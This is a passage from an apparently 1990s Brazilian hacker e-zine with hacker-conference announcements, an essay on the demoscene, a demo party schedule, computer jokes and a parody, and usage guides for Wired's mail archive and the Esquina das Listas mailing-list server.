   the newsgroup alt.hacking.in.progress. If you can't find the newsgroup
   don't contact us. Refresh the grouplist in your newsreader or ask your
   access provider to check their newsfeed.



                            Heavily sponsored by

                                   XS4ALL

      *88888888888888888888888888888888888888888888888888888888888888


                                Beyond HOPE
                            http://www.2600.com
                       The "Follow On" Conference to
                       Hackers On Planet Earth (HOPE)
                            http://www.hope.net
                               New York City
                           1997 August 8, 9, & 10

   * About Beyond HOPE
          Beyond HOPE is a conference of hackers, phreaks, and netizens.
          Anyone is welcome, but we ask that you be prepared to listen at
          least half as much as you talk.

   * Where is Beyond HOPE being held?
          The Puck Building is in New York City on Houston Street between
          Lafayette and Mulberry. It is just south of Greenwich Village,
          and on the border of the Soho district. There is a floor plan
          available.

   * Where to stay
          Details on which hotels will be linked to the conference will
          be announced soon in this space. In the meantime, here are some
          nifty hotel links in New York City to give you an idea of what
          to expect.

   * Directions
          Subway: Take the Number 1 Local to Houston St and walk east.
          Take the Number 6 Local to Bleecker St and walk a block south.
          Take the A, C, or E train to Spring St and walk two blocks
          north. You're looking for the large building that says "The
          Puck Building" on it in large, friendly letters. Scholars of
          Shakespeare's "A Midsummer's Night Dream" will recognize the
          statue of Puck.

          Taxi: Tell the cabbie to go to Houston St and Lafayette.

          Note: There will be a special 2600 meeting on Friday, August
          8th from 5 pm to 8 pm at the Citicorp Center on 53rd and
          Lexington. To get to the conference from there, just hope on a
          downtown Number 6 train and get off at Bleecker Street.

   * How to get involved
          Get involved by e-mailing us. Be sure to include what you wish
          to do at the conference.

   * Planned events and other details
          Lectures, Seminars, and "hands-on" demonstrations of various
          techno-topics. What do you plan to do? (expect a hyper link
          here when we have a schedule planned - it's not ready yet).

   * Suggestions
          Please suggest things yourself. E-mail us, and they may wind up
          here. Suggestions received so far:

          + A seminar on "low bandwidth" access to the Internet from text
            based terminals such as those at public libraries.
          + A local area network on-site!! And hooked up to the Internet.
          + Internet Links to the HIP Conference in The Netherlands being
            held at the same time. Voice, data, and video links are
            "in-work".

   * About the Puck building
          As everyone who really knows New York City agrees, the Puck
          Building is one of our most exceptional landmarks.

          Listed on the National Historic Register, this grand Romanesque
          Revival structure was designed by Albert Wagner and built in
          1885 for the J. Ottman Lithographic Company. Originally, the
          land on which the building stands was farmland owned by
          Nicholas Bayard. During the mid 1800's, the property held a
          house occupied by the Sisters of Charity, which was purchased
          and demolished in 1885 when construction of the current
          building began.

          The building's style reflects the Chicago School of
          architecture which was known for steel frame construction,
          horizontal bands of windows, and the skillful use of brick. In
          the case of the Puck, an unusual type of thin-line English
          brick was chosen for the facade. The building's exterior
          projects a feeling of strength balanced by lightness and
          graceful simplicity.

          more on the Puck Building....

   * About NYC
          What more needs be said? It's New York City, after all. The
          Bronx is up, and The Battery's down. Here's the Official New
          York City Web Site to help you. You'll also want to get tourist
          map s & brochures (if you have a high speed Internet link) from
          the New York Convention and Visitors Bureau Home Page.

   * BeyondHope FAQ
          E-mail questions, and they will be answered, and might show up
          here.

   * How to Pre-register
          Haven't gotten that far yet, but as you can see, we're thinking
          about it.

   * The Network
          We will have at the very least a T1 connection to the outside
          world. This promises to be one of the best network connections
          ever at a hacker conference. Again, to get involved, e-mail us.

                   -------------------------------------

DEF CON V - Julho 11-13 - Las Vegas, Nevada - http://www.defcon.org

                            ------------------

     _________________________________________________________________


                  DEMO CODING: HACKING , ARTE , OU O QUE?
                  =======================================
                  Edward de Oliveira Ribeiro
  Ola!

  Eh incrivel como ,dentre todos os (novos) habitos culturais trazidos pela
Internet e BBS's mundo afora , o hacking  tenha chamado tanta atencao.Eh...
"Computer  Underground"  soa bem  aos ouvidos , embora  seja  frustante   o
fim de jovens talentosos como (o superstar) Mitnick, Phiber Optik   e  cia.
Sera que todo fucador brilhante tem que ir pra cadeia? Faz parte  do  show?
Bem, sinceramente eu acredito que nao. E nao estou sozinho. Prova  disso eh
o crescimento mundial da  "demoscene".

  Demo... O que?

  Demoscene(  literalmente  cena demo) eh um movimento(?) onde  jovens   se
reunem  em  grupos para ensinar e aprender programacao ,alem   de   criarem
seus proprios programas. Muito parecido com a cena hacker ,nao? A diferenca
eh   que neste caso os tais  programas nao tem nada a ver com  cracking   e
sim   com  arte.  Os  tais demos  nada   mais  sao  do   que   programinhas
executaveis  DEMOstrativos que tentam extrair o maximo do micro em  materia
de   computacao  grafica  e  efeitos  especiais.Ray  tracing,  rotacao  3D,
simulacao  de  fogo e morphing sao super explorados. Um p***  exercicio  de
criatividade  e   programacao.  O tamanho  dos programas varia  de  4k  (as
chamadas Intros) a  2.0  mega  e o estilo tambem(cada grupo de  demo-coding
tem os seus proprios macetes de programacao e otimizacao de software que so
os membros do grupo  conhecem).Vale ressaltar que nem todos os  integrantes
dos       grupos      de       demo-coding       sao       programadores,ou
melhor,"coders"(codificadores).  Como os  demos lancados  muitas vezes  sao
superproducoes  eh muito comum (quase regra) encontrar artistas graficos  e
musicos participando em  postos  em definidos.
  Ao  que  parece esta eh uma cena antiga ,surgida nos tempos das  BBS's  ,
pois  varios amigos meus dessa epoca virao ou tiveram  algum  programa   de
demo-groups famosos como Future Crew.
  A  coisa  parece que ta esquentando mesmo eh com a  InterNet  ,embora  vc
precise  de  paciencia pra achar material sobre o  assunto(dica:Procure  no
Yahoo  por "demoscene"). Pelo que pude constatar a maioria dos  demo-groups
vem  de  paises europeus como a Finlandia(principalmente!!!)  ,  Franca   e
Belgica.  O  Brasil,ainda nao tem uma demoscene forte,mas isso  eh  so  uma
questao  de  tempo,uma vez que a galera das BBS nao para de colocar  no  ar
sites para divulgar o assunto,sem falar nos demo-groups nacionais que estao
surgindo . Ah,  quase ia  esquecendo... um  bom combustivel  para toda essa
cena   sao  sem  sombra  de duvida as  "parties"(festas) organizadas por  e
para demo-groups.
  Mas   pode  tirar   da cabeca a ideia de alcool  ,drogas  e  baderna,  as
parties   nada   mais sao do  que concursos a nivel local,nacional  e   ate
internacional(!)  de demo-coding.Com comissao julgadora ,telao  ,premios  e
tudo o mais.
  As  vezes vai gente de toda a Europa para,por exemplo, a Belgica  so  pra
ver/participar  da  disputa realizada em varios niveis (tem ate  de  musica
mod/wav/midi).  Alguns  cobram uma pequena taxa de adesao  para  cobrir  os
custos  ,uma   vez que algumas parties chegam  durar   uma  semana  inteira
varando a noite  ( mulheres  nao pagam! :-) ).
  Existem  aqueles  demo-groups que ja se tornaram famosos  tipo  o  citado
Future Crew,Complex,NoooN  e outros de nomes esquisitissimos(obs:os membros
dos  demo-groups tb sao identificados por apelidos). Os demos desses grupos
sao   de fazer o Hans Donner e o Spielberg irem vender balinha no sinal  de
transito  de tao bem produzidos. Tanto eh  assim  que  o  demo acaba  sendo
um   belo portfolio de apresentacao. Os coders  do  Future , por exemplo  ,
estao  trabalhando  num  projeto  de acelerador grafico 3D  (  tipo  MMX  )
chamado   Piramid3D pra Triangle Software  enquanto o musico do  grupo   ta
compondo trilha prum jogo duma empresa cujo nome eu esqueci. Sem  falar que
Psi ,um dos principais coders do Future ,inventou(eh inventou!)um padrao de
audio  semelhante ao MOD soh pra incrementar ainda mais os demos(pra  falar
a  verdade  ele  nao foi o unico,varios outros  coders  inventaram  padroes
semelhantes).   Isso    mostra   que  os  caras  alem   de   aprenderem   a
programar/compor/desenhar os caras se dao bem  gracas aos demos.
  Se  vc se interessou pelo demo-coding e deseja entrar nesse  universo  ai
vao algumas dicas/conselhos:
  1)Os  coders  iniciantes  podem  comecar com  o  Pascal,uma  vez  que  os
tutoriais    para  demo-coding  sao em sua  maioria  sao  nessa  linguagem.
Contudo  tenha em mente que se vc quiser ir alem do  arroz-com-feijao  tera
mais  cedo ou mais  tarde que cair no Assembler : puro ou com gelo(no  caso
C);
  2)Encare  os demos como uma campanha publicitaria,afinal eles eh que  vao
construir  a imagem do seu grupo. Demos mais trabalhados chegam a levar  de
tres a seis meses para serem feitos;
  3)Aprenda  com  os codigos-fontes de demos disponiveis na  rede  ,mas  em
hipotese  alguma  roube ideias de apresentacao. A essencia  do  demo-coding
esta   em  criar  seus  PROPRIOS  demos  usandos  as  tecnicas  e   macetes
aprendidos.
  4)Troque informacao com seus colegas de grupo e com outros  grupos.Claro,
existirah aquele algoritmo de rendering fantastico  que alguem da sua turma
inventou  e que nao seria vantajoso doar pra qualquer wanna-be,entao  nesse
caso  troque por um metodo de otimizacao    de rotinas que a turma  "rival"
inventou;
  5)Os tutoriais distribuidos pela Net vao ser de grande valia. No endereco
ftp.cdrom.com  vc encontra toneladas deles,contudo,lembre-se que  eles  nao
vao  ensinar  tudo.Na verdade estao bem longe disso,uma vez que sao  so   o
ponto  de partida para voos mais altos. Se quer ser um fucking  coder  tera
que  gastar tempo e dinheiro em livros. Nao eh facil e nao eh  para  todos,
infelizmente;
  6)Vasculhe o Altavista e o Lycos usando "demoscene" como palavra chave;
  6.1)Vasculhe tb as BBS's em busca de demos/informacao;
  7)Um ultimo aviso:se por acaso  voce quiser  apenas pescar  demos bacanas
na  Net  tenha  o  cuidado  de contar com um  bom  anti-virus  p/  fazer  a
limpeza,pois  nunca  sabemos  ao  certo o  que  nos  estamos  levando  para
casa.>:=/

  Segue anexo um roteiro de uma party supostamente  realizada no final do
  ano passado na Belgica:

  =C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4[ 10. PARTY S=
CHEDULES ]=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=
=C4=C4
   FRIDAY 01.11.96

   11: Party doors open
   12:
   13:
   14:
   15:
   16:
   17:
   18:
   19:
   20:
   21:
   22: Deadline Ansi Competition
   23: Deadline Music Competition
   24: Concert TRAXX Live.

   SATURDAY 02.11.96

   01: Deadline Graphic & Raytrace Graphic Competition
   02: Ansi Competition Starts
   03:
   04:
   05:
   06: Graphic Competition Starts
   07: Raytrace Competition Starts
   08:
   09: Music Competition Starts
   10:
   11: Deadline 4k intro
   12:
   13:
   14: 4k intro competition starts
   15:
   16: Deadline 64k intro compo
   17:
   18: Deadline Demo Competition
   19:
   20:
   21: 64k intro Compo Starts
   22:
   23: Demo Competition Starts
   24:

   SUNDAY 03.11.96

   01:
   02:
   03: Deadline Raytrace Movie
   04:
   05:
   06:
   07: Raytrace Movie Competition Starts
   08:
   09: DEADLINE FOR VOTING
   10:
   11:
   12:
   13:
   14: PRIZE CEREMONY
   15:
   16:
   17: Party Doors Close
 =C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=
=C4[ 11. DISCLAIMER ]=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=
=C4=C4=C4=C4=C4=C4=C4
---------------------------------------------------------------------------




               NEWS - PIADAS - BUGS - LINUX - DICAS - ETC..
               ============================================

PIADAS e FATOS ENGRACADOS

Subject: [PIADAS-L] Voce se considera ignorante em computadores??                               (fwd)

Entao verifique os casos ocorridos abaixo, de um artigo do Wall Street
Journal por Jim Carlton:

1. A Compaq esta' pensando em mudar o comando "Press Any Key" por causa da
enxurrada de consultas tecnicas perguntando sobre onde fica a tecla "Any".

2. O suporte tecnico da AST tem uma chamada de uma mulher reclamando que o
mouse dela e' de dificil controle. Descobriu-se que era porque ela nao
tinha retirado o plastico que o protege contra po'.

3. Um tecnico de suporte da Compaq recebeu uma chamada reclamando que o
sistema nao conseguia ler os arquivos de seus diskettes mais antigos.
Depois de varios testes infrutiferos nos drives, descobriu que o usuario
colocava etiquetas nos diskettes e os introduzia na maquina de escrever
para datilografar as etiquetas.

4. Um usuario foi solicitado a enviar uma copia de seus diskettes
defeituosos. Alguns dias depois chegou uma carta do usuario com copias
xerox dos diskettes.

5. Um tecnico da Dell orientou seu cliente para colocar seu diskette com
problemas de volta no drive A: e fechar a porta. O cliente disse para o
tecnico esperar um pouco, deitou o telefone sobre a mesa, atravessou a sala
e foi fechar a porta da sala.

6. Um usuario da Dell chamou o suporte tecnico reclamando que seu
computador nao conseguia enviar nenhum fax. Depois de 40 minutos tentando
achar o erro, descobriu que o usuario estava tentando enviar o fax
colocando a folha de papel na frente do monitor e clicando o botao "Send
Fax".

7. Outro usuario da Dell reclamou que seu teclado nao mais estava
funcionando. Como o teclado estivesse muito sujo, ele lavou-o na pia e
deixou-o secando  noite. Depois tirou todas as teclas e lavou-as com agua e
sabao.

8. O suporte tecnico da Dell recebeu uma chamada de um usuario furioso
porque seu computador havia-lhe chamado de "ruim e invalido". O tecnico
explicou que a frase se referia a um comando e nao devia ser tomada a nivel
pessoal.

9. Uma usuaria desesperada chamou a Dell porque nao conseguia ligar seu
computador. Depois de se assegurar que o havia ligado na tomada, o tecnico
perguntou-lhe o que acontecia quando ela apertava o botao de ligar. Ela
respondeu que pisava e pisava no
pedal e nada acontecia. O pedal era o mouse.

10. Uma usuaria ligou para a Compaq dizendo que seu computador novo nao
funcionava. Ela disse que tirou o computador da embalagem, ligou-o na
tomada, esperou 20 minutos e nada aconteceu. Quando perguntada sobre o que
ocorria quando ela apertava o botao de ligar  ela respondeu: "Que botao de
ligar?".

---------------------------------------------------------------------------
"E comovente a historia de um Sysop da Novell Netware atendendo a um
telefonema

- Departamento Tecnico, posso ajuda-lo?

- Sim, o problema e o seguinte: o suporte de copos de meu PC quebrou. Mas
ele ainda esta na garantia e gostaria de conserta-lo.

- Suporte de copos?

- Sim, fica bem na frente do computador.

- Desculpe, mas isso nao faz parte de nossa configuracao. Onde o Sr.
comprou o suporte: numa loja, numa feira? E importado? Ele tem alguma marca
de fabricante?

O usuario entao responde:

- Nao, ele veio com a maquina. Esta escrito 4X.

[]'s
----------------------------------------------------------------
Fabricio A.M.

Subject: [PIADAS-L]  (fwd)

        Todos sabem (exceto os que ignoram) que temos hoje capacidade de fazer uma
esfera virtual (um "planeta") de qualquer tamanho, colocar nela trilhoes de
informacoes, e gerar "seres" que aprenderao a historia que acabamos de
criar e acreditarao que vivem num mundo que tem milhoes de anos. E se
fossemos nos, tambem, aqui na Terra, uma mera experiencia de Deus,
recem-criada? Pessoalmente, acredito nesta hipotese, sobretudo depois que,
atraves de minha interface informatica (o geologo Gravata), recebi este
documento secreto, conhecido apenas por 80 milhoes de usuarios da internet:

NO PRINCIPIO DEUS USOU O UNIX...

pois no principio so havia Deus Todo-Poderoso e o sistema UNIX ("ewe-niks",
na intimidade), multitask e multiusuario, tambem todo-poderoso. Aqui,
unixemente, % e Deus e #, UNIX.

% "Faca-se a luz!"
#  Entre identificacao usuario.
% Deus.
#  Entre senha.
% Onisciente.
#  Senha incorreta. Tente de novo.
% Onipotente.
#  Senha incorreta. Tente de novo.
% Tecnocrata.
#  E Deus acessou o sistema as 12:01:00, domingo, 1 de abril. Estabeleca
seu credito.
% US$ 100.00
#  Confirmado. US$ 100.00
% Faca-se a luz!
#  Comando inexistente. Tente de novo.
% Invente-se a luz!
#  Feito.
% Rodar Ceu e Terra.
#  E Deus criou o Dia e a Noite. E Deus viu que havia 0 (zero) erros.
# # E Deus saiu do sistema as 12:02:00, domingo, 1 de abril.
# # # Saldo de Deus Todo-Poderoso: US$ 98.50
# # # # Deus voltou a acessar o sistema as 12:01:00 da segunda-feira, 2 de
abril.
% Haja firmamento no meio das aguas e da luz.
#  Comando irreconhec!vel. Tente de novo.
% Criar firmamento.
#  Feito.
% Rodar firmamento.
#  E Deus dividiu as aguas. E Deus viu que havia 0(zero) erros.
# # E Deus desconectou as 12:02:00 de segunda-feira, 2 de abril.
# # Saldo restante: US$ 91.40
# # # E Deus voltou ao sistema as 12:01:00, terca-feira, 3 de abril.
% Faca-se com que todas as aguas sob o Firmamento se juntem e que a Terra
Seca surja em meio a elas.
#  Excesso de caracteres - imposs!vel compactar comando. Tente de novo.
% Criar  Terra Seca.
#  Feito.
% Rodar Firmamento.
#  Comando obedecido. Aguas divididas. E Deus viu que havia 0 (zero) erros.
# # Deus desconectou as 12:02:00, terca-feira, 3 de abril.
# # # Saldo: US$ 67.10
# # # # Deus reconecta as 12:01:00, terca-feira, 4 de abril.
% Criar Luzes no Firmamento para dividir dia e noite.
#  Tipo de tecnologia nao especificado. Tente de novo.
% Criar um Sol, uma Lua e 100 mil Estrelas.
#  Feito.
# # Deus criou os Ceus. E Deus viu que havia 0 (zero) erros.
# # # Deus desconectou as 12:02:00, quarta-feira, 4 de abril.
# # # # Saldo: US$ 61.00
# # # # # Deus reconectou as 12:01:00 da quinta-feira, 5 de abril.
% Criar peixes.
#  Feito
% Criar aves de modo geral e Ovo de galinha em particular. Caprichar na
embalagem.
#  Aves criadas. Imposs!vel Ovo so de galinha. Tente de novo.
% Criar Ovo generico, inclusive para jacare. Caprichar na embalagem do Ovo
generico
#  Feito.
% Rodar peixes, aves, ovos.
#  Deus criou os Monstros marinhos e todas as criaturas vivas ate as aguas
se escurecerem com rebanhos e cardumes de peixes e semelhantes  e o ceus
ficarem cheios com todos os animais alados. E Deus viu que havia 0 (zero)
erros.
# # Deus desconectou as 12:02:00 da quinta-feira, 5 de abril.
# # # Saldo remanescente: US$49.74
# # # # Deus reconecta as 12:01:00, sexta-feira, 6 de abril.
% Criar o gado.
#  Feito.
% Criar as coisas rateiras, horripilantes, hediondas e nojentas.
#  Feito.
% Fazer o homem a nossa imagem.
#  Caracteristicas nao especificadas. Tente de novo.
% Criar o homem de qualquer maneira.
#  Feito.
% Fazer o homem multiplicar e povoar a Terra  e dominar os peixes no mar,
as aves do ar, e ter ascend^Hncia sobre todas as coisas que rastejam sobre a
Terra.
#  Excesso de comandos simultaneos. Tente novamente.
% Rodar multiplicai.
# Comando realizado. 7 erros.
% Incluir respirar.
#  Feito.
% Repetir multiplicar sem limite.
#  Execucao completa. 4 erros.
% Mover homem para Jardim do eden.
#  Feito.
% Rodar multiplicai. Sem limite.
#  Execucao terminada. 3 erros.
% Inserir mulher no homem.
#  Parametros invertidos. Retifique.
% Inserir homem na mulher.
#  Feito.
% Rodar multiplicai.Sem limite.
#  Operacao executada. 345 erros.
% Criar desejo.
#  Feito.
% Rodar multiplicai. Sem limite.
#  E Deus viu o homem e a mulher sendo frutiferos e multiplicando no Jardim
do eden. 666 erros.
*  Atencao: Rodar sem limite de tempo. 4212 erros.
% Criar livre arbitrio.
#  Feito.
% Rodar livre arbitrio.
#  Feito.
% Eliminar desejo.
#  Desejo nao pode ser eliminado devido a criacao do livre arbitrio.
% Destruir livre arb!trio.
#  Livre arbitrio e arquivo inacessivel e nao pode ser destruido.
*  Acione tecla de substituicao, cancelamento ou help.
% Criar  arvore da ciencia do conhecimento.
#  E Deus viu o homem e  a mulher sendo frutiferos e multiplicando no
Jardim do eden, ja  nao respeitando parametros estabelecidos.
% Criar o bem e o mal.
#  Feito.
% Ativar mal.
#  E Deus viu que tinha criado a vergonha.
* Atencao: Erro do sistema na ultima operacao E96. Homem e mulher nao estao
em Jardim do eden. 4277732 erros.
% Scannear Jardim, E.D.E.N. homem-mulher.
#  Busca negativa.
% Apagar vergonha.
#  Vergonha nao pode ser apagada com mal ativado.
% Destruir livre arb!trio.
#  Arquivo incessivel. Nao pode ser destruido.
*  Acione tecla de substituicao, cancelamento ou help.
% Interromper programa!
#  Exclamacao imperativa torna comando irreconhec!vel. Tente interrogacao
ou Help.
% Suspender programa.
% Suspender programa.
% Suspender programa, porra!
#  Atencao todos usuarios.  Atencao todos usuarios. Sistema desligado para
manutencao rotineira.
Por favor, desliguem.
% Criar novo mundo.
#  O usuario ultrapassou o espaco-tempo estatico-dinamico do arquivo
criacao. Eliminar arquivos anteriores para que novos arquivos possam ser
alocados.
% Destruir Terra.
# Destruir Terra, confirmar.
% Destruir Terra, confirmado.
#  Terra destruida. Confirmado. Desligando sistema. Dez segundos para
sistema fora do ar . Saldo final: US$ 0.00



[]'s
----------------------------------------------------------------
Fabricio A.M.

        Prezado L. A. Mo.

*************************************************

O Info-rama WIRED
------------------
O texto COMPLETO (menos propaganda) de todas os numeros anteriores
da revista wired (e texto adicional que nao foi incluido na revista)
esta' disponivel via email.

Mande e-mail para:

     info-rama@wired.com

sem subject e com as palavras:

     get help

No corpo da mensagem. Vao enviar uma mensagem explicando como usar
o Info-rama (nome do servico) para pedir arquivos da revista WIRED.

Exemplo:

Para pegar o arquivo de help e o arquivo de indice principal
coloque:

     get help
     get faq
     get master.index
     end

O "end" em seguida e' para evitar que a signature acione ou devolva
mensagem de erro. A sintaxe e' sempre:

     get 
     end

Sempre usando o info-rama@wired.com. Uma dica pra pegar a lista de
todos os arquivos anteriores e' usar o comando

      get back.back.issues
      end

Faz um tempo que nao uso isso, entao pode haver um erro nesse ultimo
arquivo. De resto, se virem. (texto mais ou menos copiado do help do
info-rama e traduzido por Derneval).

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&


ESQUINA DAS LISTAS  - PERGUNTAS MAIS FREQUENTES

Subject: Listas `a torto e `a direito

#################################################
#                                               #
#       Introdu,c~ao `a Esquina das Listas      #
#       ----------------------------------      #
#             (atrav'es de exemplos)            #
#                                               #
#       Esquina-das-Listas@dcc.unicamp.br       #
#                                               #
#################################################

Autor: Marcos J. C. Euz'ebio
 --------
| 1) Que esquina 'e esta?
 --------
  J'a foi mais f'acil explicar o que 'e a
      esquina-das-listas.  Ou talvez, eu a conhecia
      menos.  Quer dizer no in'icio havia
      um servidor de listas "tropicalizado",
      algumas listas e alguns usu'arios.

  Hoje o servidor de listas 'e apenas uma parte,
      cada vez menor, da esquina-das-listas.  O
      n'umero de listas aumentou e o n'umero de
      usu'arios tamb'em.

  Ou seja, a esquina-das-listas tem muitas
      facetas.  A principal delas 'e formada
      pelas m'ultiplas comunidades, que
      reunidas em torno de um tema, utilizam a
      face operacional da esquina para trocar
      id'eias.

  Estas id'eias s~ao difundidas de v'arias
      maneiras.  Por correio-eletr^onico e
      pelo WWW, atualmente.  No futuro pretende-se
      fazer a distribui,c~ao na Usenet e por
      ftp tamb'em.

 --------
| A quem se destina?
 --------
  A Esquina da Listas est'a aberta a todos
      que tem acesso `a internet.  A distribui,c~ao
      autom'atica de mensagens, por correio
      eletr^onico, a assinantes est'a restrita
      aos provedores dispostos a colaborar com
      a tarefa.  Detalhes do funcionamento
      da esquina-das-listas podem ser obtidos
      em outro documento.  Escreva para
      esquina-das-listas@dcc.unicamp.br e coloque,
      no in'cio da mensagem,

          ciranda

      para receb^e-lo.

  O acesso ao reposit'orio de mensagens
      da esquina n~ao est'a sujeito a nenhuma
      restri,c~ao.  A vers~ao www do reposit'orio
      encontra-se na url:

          http://www.dcc.unicamp.br/esquina-das-listas/esquina.html

  As mensagens tamb'em podem ser solicitadas, uma-a-uma,
      do reposit'orio, por correio eletr^onico.  Vide os
      comandos indice e envie abaixo.

 --------
| Quais os endere,cos da esquina?
 --------

  S~ao os seguintes:

      mailto:esquina-das-listas@dcc.unicamp.br
      http://www.dcc.unicamp.br/esquina-das-listas/esquina.html
      news: (em implanta,c~ao)
      ftp: (em implanta,c~ao)

 --------
| Como participar da esquina?
 --------
  A participa,c~ao, ativa, na esquina 'e
      intermediada pelo servidor da esquina.
      Ou seja, toda contribui,c~ao ou pedido
      administrativa deve ser enviada,
      por correio eletr^onico, ao servidor
      da esquina (esquina-das-listas@dcc.unicamp.br).

  Os pedidos podem conter um ou
      mais comandos.  Comandos devem
      come,car no in'icio da linha e 'e
      permitido apenas um comando por
      linha.  Se o comando for muito
      longo e n~ao cabe em uma s'o
      linha pode-se continuar na linha
      seguinte, deixando um ou mais
      espa,cos em branco no in'icio
      da continua,c~ao.

 --------
| Como parar de receber uma lista?
 --------
  Para interrromper a vinda de mensagens
      de uma lista, mpb, p. ex., envie o
      comando:

         cancele mpb

  Voc^e deve adicionar o endere,co de
      assinatura, quando ele for diferente
      do endere,co de envio da mensagem.

  Se voc^e n~ao sabe sob qual o endere,co
      est'a a assinatura utilize o comando
      usuarios, que permite fazer pesquisas
      sobre a rela,c~ao de usu'arios da
      esquina.  Por exemplo:

          usuarios futebol jose

      vai devolver a rela,c~ao dos assinantes
      da lista futebol que jose no
      seu endere,co.

 --------
| Como se inscrever em uma lista?
 --------
  Para assinar a lista formula-1, por exemplo,
      seu pedido deve conter um comando assim:

          inscreva formula-1

  Inclua o endere,co eletr^onico de
      assinatura se ele 'e diferente do que
      aparece na sua mensagem.

  A inscri,c~ao em uma lista n~ao garante
      a recep,c~ao autom'atica de todas as
      mensagens submetidas `a mesma.  Primeiro
      porque a distribui,c~ao s'o feita aos
      provedores cadastrados e aderentes ao
      esquema de distribui,c~ao da esquina.  Em segundo
      lugar as condi,c~oes de tr'afego na
      internet podem dificultar ou at'e impedir
      a entrega de mensagens.

 --------
| E para submeter uma contribui,c~ao?
 --------
   Para enviar um artigo para a
       lista futebol inclua o comando

           submeta futebol

       na primeira linha do seu artigo.

   Evite excesso de cita,c~oes (linhas
       obtidas em outras mensagens e que comecem
       com o caracter ">").

   Mensagens muito longas poder~ao n~ao ser
       distribu'idas para todos os usu'arios.  O
       sistema de distribui,c~ao imp~oe um limite
       de tempo para o envio de uma mensagem.
       Se o limite 'e ultrapassado a mensagem
       n~ao 'e enviada.

   Embora o t'opico esteja fora do escopo deste
       guia, 'e sempre bom lembrar que a observ^ancia
       de normas m'inimas de educa,c~ao e bom senso
       s~ao ainda mais importantes no meio eletr^onico.
       Ao respeit'a-las voc^e estar'a dando
       um bom exemplo, contribuindo para a
       para a melhoria da qualidade da intera,c~ao
       e conviv^encia entre os participantes da
       esquina e minimizando dores de cabe,ca para
       voc^e mesmo.  Dois conselhos que fazem
       parte do folclore da net s~ao: n~ao irrite
       e n~ao se irrite!

   A esquina permite a realiza,c~ao de
       "cross-postings": submiss~ao simult^anea
       de uma mensagem para v'arias listas (da
       esquina).  O abuso desta facilidade
       irrita muita gente.

 --------
| Quais as listas dispon'iveis?
 --------
  A rela,c~ao completa das listas dispon'iveis
      pode ser obtida atrav'es do comando:

           listas

 --------
| Como solicitar mensagens do reposit'orio da esquina?
 --------
  As mensagens submetidas `a esquina ficam
      armazenadas em um reposit'orio por um tempo
      limitado (sete dias, atualmente).  C'opias
      destas mensagens podem ser solicitadas
      por correio eletr^onico.  Dois comandos s~ao
      necess'arios para a utiliza,c~ao deste servi,co.

  O comando

         indice religiao

      retorna uma rela,c~ao das mensagens,
      submetidas `a lista religi~ao, p.ex.,
      e que est~ao dispon'iveis no reposit'orio.
      Na rela,c~ao aparece a identifica,c~ao
      associada a cada mensagem e que deve
      ser usada para solicit'a-la.

  Para solicitar de uma determinada
      mensagem 'e necess'ario saber a identifica,c~ao
      da mesma.  Depois 'e s'o enviar o comando

      envie religiao/1-1

      para a esquina para receber a
      c'opia da mesma.

  Este servi,co est'a aberto a todos os
      usu'arios, indepente da posi,c~ao
      do provedor com rela,c~ao `a esquina.

 --------
| Como obter informa,c~oes sobre os usu'arios da esquina?
 --------
  O cadastro dos usu'arios da esquina pode ser
      pesquisado com a utiliza,c~ao do comando
      usuarios.  Este comando permite a realiza,c~ao
      de buscas variadas.  Por exemplo:

  usuarios mpb
     Fornece a rela,c~ao dos participantes
     da lista mpb, neste caso.

  usuarios iacec.unicomp.br
     Devolve a rela,c~ao das assinaturas
     provenientes do Inst. de Artes, Ci^encias
     e Engenharias de Computa,c~ao da Universidade
     de Compinas.

  usuarios iacec.unicomp.br mpb
     Restringe `a assinaturas da lista mpb

  usuarios mpb jose
     Restringe a busca aos assinantes da
     da lista mpb em que aparece a palavra jose.

  usuarios jose
     Restringe a busca aos assinantes
     em que aparece a palavra jose

 --------
| Outros comandos?
 --------
  Sim, dois:

  info
      Para receber a vers~ao corrente desta mensagem. (10.mar.1997)

  fim
      Indica que n~ao tem mais
      comandos na mensagem.  Funciona como
      a barreira para impedir que o servidor
      da esquina invente de tentar interpretar
      assinaturas, p. ex., como comandos.

 --------------
| Reclama,c~oes
 --------------
  A esquina  n~ao disp~oe de um servi,co
      de atendimento ao usu'ario.  Reclama,c~oes,
      d'uvida, pedidos de aux'ilio devem ser submetidos
      `a lista esquina.

  Se voc^e assina a lista esquina sinta-se
      a vontade para responder as d'uvidas dos
      seus colegas.  Se poss'ivel envie a resposta
      tamb'em para a lista esquina, com isto
      outros tamb'em se beneficiar~ao.

  Outra forma de colaborar 'e na elabora,c~ao
      de faq's (Quest~oes frequentes e respostas).
      Elas auxiliam aos novos assinantes entrar
      no contexto da lista, al'em de evitar
      a repeti,c~ao de perguntas frequentes.
      Se voc^e sente-se preparado para preparar
      uma faq para alguma lista v'a em frente.
      A faq deve ser enviada periodicamente `a
      lista.

 --------
| E para criar uma lista?
 --------
  O processo de cria,c~ao de uma lista no
  servidor da esquina das listas 'e um tanto
  trabalhoso e exige uma certa bagagem na
  utiliza,c~ao de correio eletr^onico, de modo
  geral, e da esquina-das-listas, em particular.

  Se voc^e est'a disposto a criar uma lista
  'e recomendado, antes de mais nada, que se
  inscreva na lista esquina.  Nesta lista
  s~ao tratados de assuntos ligados `a
  administra,c~ao e utiliza,c~ao da
  esquina-das-listas.  C'opias de mensagens
  relacionadas ao processo de cria,c~ao de
  uma lista devem ser enviadas para l'a.

  O processo de cria,c~ao de uma lista na
  esquina-das-listas 'e p'ublico e a participa,c~ao
  'e aberta a todos integrantes da internet.

  Para que sua lista seja criada 'e importante
  que voc^e entenda os passos a serem listados
  a seguir e os siga.  Caso contr'ario sua
  lista _n~ao_ ser'a criada.

  0- Consulta e Discuss~ao
     ---------------------
     Nesta fase, informal, o proponente da lista deve
     conversar com seus colegas e participantes
     de listas voltadas para assuntos
     parecidos com o da lista que ele pretende
     criar.  Porque destas conversas?  Pelos
     motivos abaixo:
       . escutar a opini~ao de terceiros sobre
         a exist^encia da necessidade da lista;
       . verificar se j'a n~ao existe alguma outra
